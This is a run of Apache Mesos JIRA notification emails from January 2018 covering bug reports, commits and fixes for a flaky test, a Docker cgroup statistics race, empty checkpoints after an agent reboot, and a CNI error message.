[jira] [Commented] (MESOS-8305) DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.
[ https://issues.apache.org/jira/browse/MESOS-8305?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16337043#comment-16337043 ] Qian Zhang commented on MESOS-8305:
---
commit 180129dbd2cc2d8e130e860a4de30d211a69f6be
Author: Qian Zhang
Date: Tue Jan 23 08:33:03 2018 +0800

    Fixed a race in the test `ROOT_MultiTaskgroupSharePidNamespace`.

    In the test `DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace`, we read the file `ns` in each of the two tasks' sandboxes and check whether their contents (the pid namespace of the task itself) are the same. However, it is possible that we read the file for the second task after it has been created but before it has been written, i.e., the content we read from the `ns` file of the second task would be empty, which causes the check to fail. In this patch, we read the file `ns` for each task in a while loop, and only break from the loop when neither task's file is empty.

    Review: https://reviews.apache.org/r/65278

> DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.
> ------------------------------------------------------------------
>
>                 Key: MESOS-8305
>                 URL: https://issues.apache.org/jira/browse/MESOS-8305
>             Project: Mesos
>          Issue Type: Bug
>         Environment: Ubuntu 16.04
>                      Fedora 23
>            Reporter: Alexander Rukletsov
>            Assignee: Qian Zhang
>            Priority: Major
>              Labels: flaky-test
>             Fix For: 1.6.0
>
>         Attachments: ROOT_MultiTaskgroupSharePidNamespace-badrun.txt
>
>
> On Ubuntu 16.04:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1877
> Expected: strings::trim(pidNamespace1.get())
> Which is: "4026532250"
> To be equal to: strings::trim(pidNamespace2.get())
> Which is: ""
> {noformat}
> Full log attached.
> On Fedora 23:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1878
> Expected: strings::trim(pidNamespace1.get())
> Which is: "4026532233"
> To be equal to: strings::trim(pidNamespace2.get())
> Which is: ""
> {noformat}
> The test became flaky shortly after MESOS-7306 was committed and is likely
> related to it.
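The patch's retry approach, re-reading each `ns` file until it is non-empty, can be sketched roughly as follows. This is an illustrative standalone helper, not the actual test code; the function name and plain `ifstream` I/O are assumptions (the real test presumably uses Mesos' stout file utilities inside the test loop):

```cpp
#include <cassert>
#include <fstream>
#include <sstream>
#include <string>

// Keep re-reading a file until it has non-empty content: the file may
// exist (creation has happened) before the writer has written to it,
// which is exactly the race the test hit.
inline std::string readWhenNonEmpty(const std::string& path, int maxAttempts)
{
  std::string content;
  for (int i = 0; i < maxAttempts; ++i) {
    std::ifstream file(path);
    std::ostringstream buffer;
    buffer << file.rdbuf();
    content = buffer.str();
    if (!content.empty()) {
      break;  // Both creation and write have happened; safe to compare.
    }
    // A real test would sleep briefly between attempts here.
  }
  return content;
}
```

With both tasks' files read this way, comparing the two pid-namespace strings no longer races against the second task's write.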
-- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jie Yu updated MESOS-8480:
---
Description:
The way we get resource statistics for Docker tasks is by first getting the cgroup subsystem path through {{/proc//cgroup}} (taking the {{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then we read {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} to get the statistics:
{noformat}
user 4
system 0
{noformat}
However, when a Docker container is being torn down, it seems that Docker or the operating system will first move the process to the root cgroup before actually killing it, making {{/proc//cgroup}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes a racy call to [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] return a single '/', which in turn makes [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}
This can be reproduced by [^test.cpp] with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...
Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0
Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461
Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461
Failed to open file '/proc/44224/cgroup'
sleep
[2]- Exit 1 ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}

was:
The way we get resource statistics for Docker tasks is through getting the cgroup subsystem path through {{/proc//docker}} first (taking the {{cpuacct}} subsystem as an example):
{noformat}
9:cpuacct,cpu:/docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b
{noformat}
Then read {{/sys/fs/cgroup/cpuacct//docker/66fbe67b64ad3a86c6e080e18578bc9e540e55ee0bdcae09c2e131a4264a3a3b/cpuacct.stat}} to get the statistics:
{noformat}
user 4
system 0
{noformat}
However, when a Docker container is being teared down, it seems that Docker or the operation system will first move the process to the root cgroup before actually killing it, making {{/proc//docker}} look like the following:
{noformat}
9:cpuacct,cpu:/
{noformat}
This makes a racy call to [{{cgroup::internal::cgroup()}}|https://github.com/apache/mesos/blob/master/src/linux/cgroups.cpp#L1935] return a single '/', which in turn makes [{{DockerContainerizerProcess::cgroupsStatistics()}}|https://github.com/apache/mesos/blob/master/src/slave/containerizer/docker.cpp#L1991] read {{/sys/fs/cgroup/cpuacct///cpuacct.stat}}, which contains the statistics for the root cgroup:
{noformat}
user 228058750
system 24506461
{noformat}
This can be reproduced by [^test.cpp] with the following command:
{noformat}
$ docker run --name sleep -d --rm alpine sleep 1000; ./test $(docker inspect sleep | jq .[].State.Pid) & sleep 1 && docker rm -f sleep
...
Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct//docker/1d79a6c877e2af3081630aa57d23d853e6bd7d210dad28f897556bfea20bc9c1/cpuacct.stat'
user 4
system 0
Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461
Reading file '/proc/44224/cgroup'
Reading file '/sys/fs/cgroup/cpuacct///cpuacct.stat'
user 228058750
system 24506461
Failed to open file '/proc/44224/cgroup'
sleep
[2]- Exit 1 ./test $(docker inspect sleep | jq .[].State.Pid)
{noformat}

> Mesos returns high resource usage when killing a Docker task.
> -------------------------------------------------------------
>
>                 Key: MESOS-8480
>                 URL: https://issues.apache.org/jira/browse/MESOS-8480
>             Project: Mesos
>          Issue Type: Bug
>          Components: cgroups
>            Reporter: Chun-Hung Hsiao
>            Assignee: Chun-Hung Hsiao
>            Priority: Major
>             Fix For: 1.3.2, 1.4.2, 1.6.0, 1.5.1
>
>         Attachments: test.cpp
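The `/proc/<pid>/cgroup` lookup the description walks through can be sketched as below. `parseCgroupLine` is a hypothetical helper for illustration only (not the Mesos `cgroups::internal::cgroup()` implementation); it shows how a subsystem's cgroup path is extracted from one line of that file, and how the racy teardown state surfaces as a bare `/`:

```cpp
#include <cassert>
#include <sstream>
#include <string>

// Parse one line of /proc/<pid>/cgroup, whose format is
//   hierarchy-ID:controller-list:cgroup-path
// e.g. "9:cpuacct,cpu:/docker/66fbe67b...". Returns the cgroup path if
// `subsystem` appears in the controller list, else "". A returned "/"
// means the process is already in the root cgroup -- the racy state
// this issue describes.
inline std::string parseCgroupLine(
    const std::string& line, const std::string& subsystem)
{
  std::istringstream stream(line);
  std::string id, controllers, path;
  if (!std::getline(stream, id, ':') ||
      !std::getline(stream, controllers, ':') ||
      !std::getline(stream, path)) {
    return "";
  }

  // The controller list is comma-separated, e.g. "cpuacct,cpu".
  std::istringstream controllerStream(controllers);
  std::string controller;
  while (std::getline(controllerStream, controller, ',')) {
    if (controller == subsystem) {
      return path;
    }
  }
  return "";
}
```

Appending the returned path to `/sys/fs/cgroup/cpuacct` then yields the `cpuacct.stat` file to read, which is why a `/` result silently redirects the read to the root cgroup's statistics.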
[jira] [Commented] (MESOS-8481) Agent reboot during checkpointing may result in empty checkpoints.
[ https://issues.apache.org/jira/browse/MESOS-8481?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336793#comment-16336793 ] Chun-Hung Hsiao commented on MESOS-8481: [~jieyu] pointed out that {{rename}} without {{fsync}} might have a "zero-length problem": https://stackoverflow.com/a/41362774 Related article: https://thunk.org/tytso/blog/2009/03/12/delayed-allocation-and-the-zero-length-file-problem/ > Agent reboot during checkpointing may result in empty checkpoints. > -- > > Key: MESOS-8481 > URL: https://issues.apache.org/jira/browse/MESOS-8481 > Project: Mesos > Issue Type: Bug >Reporter: Chun-Hung Hsiao >Assignee: Michael Park >Priority: Major > > An empty checkpoint file was created due to the following incident. > At 17:12:25, the master assigned a task to an agent: > {noformat} > I0123 17:12:25.00 18618 master.cpp:11457] Adding task 5602 with resources > cpus(allocated: *):0.1; mem(allocated: *):128 on agent > aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 > () > I0123 17:12:25.00 18618 master.cpp:5017] Launching task 5602 of framework > 6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112 (Balloon Framework OOM) at > scheduler-fbba22f7-ebbc-4864-8394-0aa558f8ffaa@:10015 with resources > [...] on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at > slave(1)@:5051 () > {noformat} > Meanwhile, the agent is being rebooted: > {noformat} > $ last reboot > reboot system boot 3.10.0-693.11.6. 
Tue Jan 23 17:14 - 00:09 (06:55) > {noformat} > The agent log did not show any information about the task, possibly because > there was no fsync before reboot: > {noformat} > I0123 17:12:09.00 17237 http.cpp:851] Authorizing principal > 'dcos_checks_agent' to GET the endpoint '/metrics/snapshot' > -- Reboot -- > I0123 17:15:40.00 2689 logsink.cpp:89] Added FileSink for glog logs to: > /var/log/mesos/mesos-agent.log > {noformat} > However, the agent was checkpointing the task before reboot: > {noformat} > $ sudo stat > /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/ > File: > ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/’ > Size: 39Blocks: 0 IO Block: 4096 directory > Device: ca40h/51776d Inode: 67306254Links: 3 > Access: (0755/drwxr-xr-x) Uid: (0/root) Gid: (0/root) > Context: system_u:object_r:unlabeled_t:s0 > Access: 2018-01-24 00:23:43.237322609 + > Modify: 2018-01-23 17:12:25.751463030 + > Change: 2018-01-23 17:12:25.751463030 + > Birth: - > {noformat} > And since there was no fsync before reboot, all checkpoints resulted in empty > files: > {noformat} > $ sudo stat > /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info > File: > ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info’ > Size: 0 Blocks: 0 IO Block: 4096 regular empty file > Device: ca40h/51776dInode: 33967500Links: 1 > Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) > Context: system_u:object_r:unlabeled_t:s0 > Access: 2018-01-23 17:15:41.485506070 + > Modify: 2018-01-23 17:12:25.749463047 + > Change: 2018-01-23 17:12:25.749463047 + > Birth: - > $ sudo stat > 
/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid > File: > ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid’ > Size: 0 Blocks: 0 IO Block: 4096 regular empty file > Device: ca40h/51776dInode: 33967495Links: 1 > Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) > Context: system_u:object_r:unlabeled_t:s0 > Access: 2018-01-23 23:00:42.190975780 + > Modify: 2018-01-23 17:12:25.749463047 + > Change: 2018-01-23 17:12:25.749463047 + > Birth: - > $ sudo stat > /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info > File: > ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info’ > Size: 0 Blocks: 0 IO Block: 4096 regular empty file > Device: ca40h/51776d Inode: 67306255Links: 1 > Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) >
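The "zero-length file problem" [~jieyu] links to above is conventionally avoided by fsyncing the data before the atomic rename, and the containing directory after it. The following is a rough standalone sketch under the assumption that this is the shape of fix being discussed; the helper name and the simplified error handling are illustrative, not the Mesos checkpointing code:

```cpp
#include <cassert>
#include <cstdio>
#include <fcntl.h>
#include <string>
#include <unistd.h>

// Crash-safe "write temp, fsync, rename" checkpoint. Without the
// fsync before rename, a reboot can leave a zero-length file behind
// the already-visible rename, which is what this issue observed.
inline bool checkpointWrite(const std::string& path, const std::string& data)
{
  const std::string temp = path + ".tmp";

  int fd = ::open(temp.c_str(), O_WRONLY | O_CREAT | O_TRUNC, 0600);
  if (fd < 0) {
    return false;
  }

  // Write all bytes and flush them to stable storage *before* renaming.
  ssize_t written = ::write(fd, data.data(), data.size());
  bool ok = written == static_cast<ssize_t>(data.size()) && ::fsync(fd) == 0;
  ::close(fd);

  if (!ok || std::rename(temp.c_str(), path.c_str()) != 0) {
    return false;
  }

  // Also fsync the containing directory so the rename itself survives
  // a crash (error handling omitted for brevity).
  size_t slash = path.find_last_of('/');
  std::string dir = (slash == std::string::npos) ? "." : path.substr(0, slash);
  if (dir.empty()) dir = "/";
  int dfd = ::open(dir.c_str(), O_RDONLY | O_DIRECTORY);
  if (dfd >= 0) {
    ::fsync(dfd);
    ::close(dfd);
  }
  return true;
}
```

With this ordering, a crash between the write and the rename leaves the old checkpoint intact, and a crash after the rename leaves the new content durable rather than an empty `framework.info`.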
[jira] [Updated] (MESOS-8481) Agent reboot during checkpointing may result in empty checkpoints.
[ https://issues.apache.org/jira/browse/MESOS-8481?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chun-Hung Hsiao updated MESOS-8481: --- Description: An empty checkpoint file was created due to the following incident. At 17:12:25, the master assigned a task to an agent: {noformat} I0123 17:12:25.00 18618 master.cpp:11457] Adding task 5602 with resources cpus(allocated: *):0.1; mem(allocated: *):128 on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 () I0123 17:12:25.00 18618 master.cpp:5017] Launching task 5602 of framework 6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112 (Balloon Framework OOM) at scheduler-fbba22f7-ebbc-4864-8394-0aa558f8ffaa@:10015 with resources [...] on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 () {noformat} Meanwhile, the agent is being rebooted: {noformat} $ last reboot reboot system boot 3.10.0-693.11.6. Tue Jan 23 17:14 - 00:09 (06:55) {noformat} The agent log did not show any information about the task, possibly because there was no fsync before reboot: {noformat} I0123 17:12:09.00 17237 http.cpp:851] Authorizing principal 'dcos_checks_agent' to GET the endpoint '/metrics/snapshot' -- Reboot -- I0123 17:15:40.00 2689 logsink.cpp:89] Added FileSink for glog logs to: /var/log/mesos/mesos-agent.log {noformat} However, the agent was checkpointing the task before reboot: {noformat} $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/ File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/’ Size: 39 Blocks: 0 IO Block: 4096 directory Device: ca40h/51776dInode: 67306254Links: 3 Access: (0755/drwxr-xr-x) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-24 00:23:43.237322609 + Modify: 2018-01-23 17:12:25.751463030 + Change: 2018-01-23 17:12:25.751463030 + Birth: - 
{noformat} And since there was no fsync before reboot, all checkpoints resulted in empty files: {noformat} $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: ca40h/51776dInode: 33967500Links: 1 Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-23 17:15:41.485506070 + Modify: 2018-01-23 17:12:25.749463047 + Change: 2018-01-23 17:12:25.749463047 + Birth: - $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.pid’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: ca40h/51776dInode: 33967495Links: 1 Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-23 23:00:42.190975780 + Modify: 2018-01-23 17:12:25.749463047 + Change: 2018-01-23 17:12:25.749463047 + Birth: - $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/executor.info’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: ca40h/51776dInode: 67306255Links: 1 Access: (0600/-rw---) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-23 17:12:25.751463030 + Modify: 2018-01-23 17:12:25.751463030 + Change: 2018-01-23 17:12:25.751463030 + Birth: - 
{noformat} So were {{forked.pid}} and {{task.info}}. As a result, the agent failed to recover after reboot: {noformat} E0123 17:15:41.00 2709 slave.cpp:6800] EXIT with status 1: Failed to perform recovery: Failed to recover framework 6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112: Failed to read framework info from '/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/framework.info': Found an empty file {noformat} The error came from
[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jie Yu updated MESOS-8480:
---
Fix Version/s: 1.5.1
               1.4.2
               1.3.2

> Mesos returns high resource usage when killing a Docker task.
> -------------------------------------------------------------
>
>                 Key: MESOS-8480
>                 URL: https://issues.apache.org/jira/browse/MESOS-8480
>             Project: Mesos
>          Issue Type: Bug
>          Components: cgroups
>            Reporter: Chun-Hung Hsiao
>            Assignee: Chun-Hung Hsiao
>            Priority: Major
>             Fix For: 1.3.2, 1.4.2, 1.6.0, 1.5.1
>
>         Attachments: test.cpp

-- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-8462) Unit test for `Slave::detachFile` on removed frameworks.
[ https://issues.apache.org/jira/browse/MESOS-8462?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336718#comment-16336718 ] Qian Zhang commented on MESOS-8462:
---
commit 12faca980084c565efdd3b0cfbb3b272d530ba5a
Author: Qian Zhang
Date: Mon Jan 22 16:14:27 2018 +0800

    Updated `SlaveRecoveryTest.RecoverCompletedExecutor` to verify gc.

    In the test `SlaveRecoveryTest.RecoverCompletedExecutor`, when the completed executor is recovered, verify that its work and meta directories are gc'ed successfully.

    Review: https://reviews.apache.org/r/65263

> Unit test for `Slave::detachFile` on removed frameworks.
> --------------------------------------------------------
>
>                 Key: MESOS-8462
>                 URL: https://issues.apache.org/jira/browse/MESOS-8462
>             Project: Mesos
>          Issue Type: Improvement
>            Reporter: Chun-Hung Hsiao
>            Assignee: Qian Zhang
>            Priority: Major
>              Labels: mesosphere
>             Fix For: 1.6.0
>
>
> We should add a unit test for MESOS-8460.

-- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336710#comment-16336710 ] Jie Yu commented on MESOS-8480:
---
commit 1382e595fa5e82f9917df97fbed76f77140ecc1e (HEAD -> master, origin/master, origin/HEAD)
Author: Chun-Hung Hsiao
Date: Tue Jan 23 17:13:05 2018 -0800

    Fixed resource statistics for Docker containers being destroyed.

    If a process has exited but has not been reaped yet (a zombie process), `/proc//cgroup` will still exist, but the process's cgroup will be reset to the root cgroup. In DockerContainerizer, we rely on `/proc//cgroup` to get the cpu/memory statistics of the container. If the `usage` call happens while the process is a zombie, the cpu/memory statistics will actually be those of the root cgroup, which is obviously not correct. See more details in MESOS-8480.

    This patch fixed the issue by checking whether the cgroup of a given pid is the root cgroup or not.

    Review: https://reviews.apache.org/r/65301/

> Mesos returns high resource usage when killing a Docker task.
> -------------------------------------------------------------
>
>                 Key: MESOS-8480
>                 URL: https://issues.apache.org/jira/browse/MESOS-8480
>             Project: Mesos
>          Issue Type: Bug
>          Components: cgroups
>            Reporter: Chun-Hung Hsiao
>            Assignee: Chun-Hung Hsiao
>            Priority: Major
>             Fix For: 1.6.0
>
>         Attachments: test.cpp

-- This message was sent by Atlassian JIRA (v7.6.3#76005)
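The guard the commit above describes, checking whether the pid's cgroup is the root cgroup before collecting statistics, might look like the following sketch. `isRootCgroup` and `shouldCollectStatistics` are illustrative names only, not the actual patch (which lives in `src/slave/containerizer/docker.cpp`):

```cpp
#include <cassert>
#include <string>

// A cgroup path of "/" from /proc/<pid>/cgroup means the process has
// already been moved to the root cgroup (e.g. a zombie being torn
// down), so its statistics must not be read.
inline bool isRootCgroup(const std::string& cgroup)
{
  return cgroup == "/";
}

inline bool shouldCollectStatistics(const std::string& cgroup)
{
  // An empty result means the subsystem was not found; "/" means the
  // racy root-cgroup state. Either way, skip collection rather than
  // report the root cgroup's (huge) usage numbers.
  return !cgroup.empty() && !isRootCgroup(cgroup);
}
```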
[jira] [Updated] (MESOS-8480) Mesos returns high resource usage when killing a Docker task.
[ https://issues.apache.org/jira/browse/MESOS-8480?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jie Yu updated MESOS-8480:
---
Fix Version/s: 1.6.0

> Mesos returns high resource usage when killing a Docker task.
> -------------------------------------------------------------
>
>                 Key: MESOS-8480
>                 URL: https://issues.apache.org/jira/browse/MESOS-8480
>             Project: Mesos
>          Issue Type: Bug
>          Components: cgroups
>            Reporter: Chun-Hung Hsiao
>            Assignee: Chun-Hung Hsiao
>            Priority: Major
>             Fix For: 1.6.0
>
>         Attachments: test.cpp

-- This message was sent by Atlassian JIRA (v7.6.3#76005)
[jira] [Commented] (MESOS-6822) CNI reports confusing error message for failed interface setup.
[ https://issues.apache.org/jira/browse/MESOS-6822?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=16336702#comment-16336702 ] Qian Zhang commented on MESOS-6822:
---
RR: https://reviews.apache.org/r/65306/

> CNI reports confusing error message for failed interface setup.
> ---------------------------------------------------------------
>
>                 Key: MESOS-6822
>                 URL: https://issues.apache.org/jira/browse/MESOS-6822
>             Project: Mesos
>          Issue Type: Bug
>          Components: network
>    Affects Versions: 1.1.0
>            Reporter: Alexander Rukletsov
>            Assignee: Qian Zhang
>            Priority: Major
>
> Saw this today:
> {noformat}
> Failed to bring up the loopback interface in the new network namespace of pid
> 17067: Success
> {noformat}
> which is produced by this code:
> https://github.com/apache/mesos/blob/1e72605e9892eb4e518442ab9c1fe2a1a1696748/src/slave/containerizer/mesos/isolators/network/cni/cni.cpp#L1854-L1859
> Note that ssh'ing into the machine confirmed that {{ifconfig}} is available
> in {{PATH}}.
> Full log: http://pastebin.com/hVdNz6yk

-- This message was sent by Atlassian JIRA (v7.6.3#76005)
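An error message ending in `: Success` typically means the code formatted `strerror(errno)` even though the failing step never set `errno` (or a later call reset it). A minimal sketch of the pitfall and a defensive fix, under the assumption that this is the cause here; `describeFailure` is an illustrative helper, not the Mesos CNI isolator code:

```cpp
#include <cassert>
#include <cerrno>
#include <cstring>
#include <string>

// Capture errno immediately at the failure site and only include it in
// the message when it actually carries information; otherwise the
// reader sees the confusing "...: Success".
inline std::string describeFailure(const std::string& action, int savedErrno)
{
  if (savedErrno == 0) {
    // errno tells us nothing here; don't print "Success".
    return action + " failed";
  }
  return action + " failed: " + std::strerror(savedErrno);
}
```

Usage at a call site would be `int saved = errno;` right after the failing call, then `describeFailure("Bringing up the loopback interface", saved)`.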
[jira] [Created] (MESOS-8481) Agent reboot during checkpointing may result in empty checkpoints.
Chun-Hung Hsiao created MESOS-8481: -- Summary: Agent reboot during checkpointing may result in empty checkpoints. Key: MESOS-8481 URL: https://issues.apache.org/jira/browse/MESOS-8481 Project: Mesos Issue Type: Bug Reporter: Chun-Hung Hsiao Assignee: Michael Park An empty checkpoint file was created due to the following incident. At 17:12:25, the master assigned a task to an agent: {noformat} I0123 17:12:25.00 18618 master.cpp:11457] Adding task 5602 with resources cpus(allocated: *):0.1; mem(allocated: *):128 on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 () I0123 17:12:25.00 18618 master.cpp:5017] Launching task 5602 of framework 6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112 (Balloon Framework OOM) at scheduler-fbba22f7-ebbc-4864-8394-0aa558f8ffaa@:10015 with resources [...] on agent aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4 at slave(1)@:5051 () {noformat} Meanwhile, the agent is being rebooted: {noformat} $ last reboot reboot system boot 3.10.0-693.11.6. Tue Jan 23 17:14 - 00:09 (06:55) {noformat} The agent log did not show any information about the task, possibly because there was no fsync before reboot: {noformat} I0123 17:12:09.00 17237 http.cpp:851] Authorizing principal 'dcos_checks_agent' to GET the endpoint '/metrics/snapshot' -- Reboot -- I0123 17:15:40.00 2689 logsink.cpp:89] Added FileSink for glog logs to: /var/log/mesos/mesos-agent.log {noformat} However, the agent was checkpointing the task before reboot: {noformat} $ sudo stat /var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/ File: ‘/var/lib/mesos/slave/meta/slaves/aaf0a62f-a6eb-4c1d-80db-5fdd26fe8008-S4/frameworks/6f9b0688-38f7-4b38-bb1c-421f55e486e5-0112/executors/5602/’ Size: 39 Blocks: 0 IO Block: 4096 directory Device: ca40h/51776dInode: 67306254Links: 3 Access: (0755/drwxr-xr-x) Uid: (0/root) Gid: (0/root) Context: system_u:object_r:unlabeled_t:s0 Access: 2018-01-24 00:23:43.237322609 + 
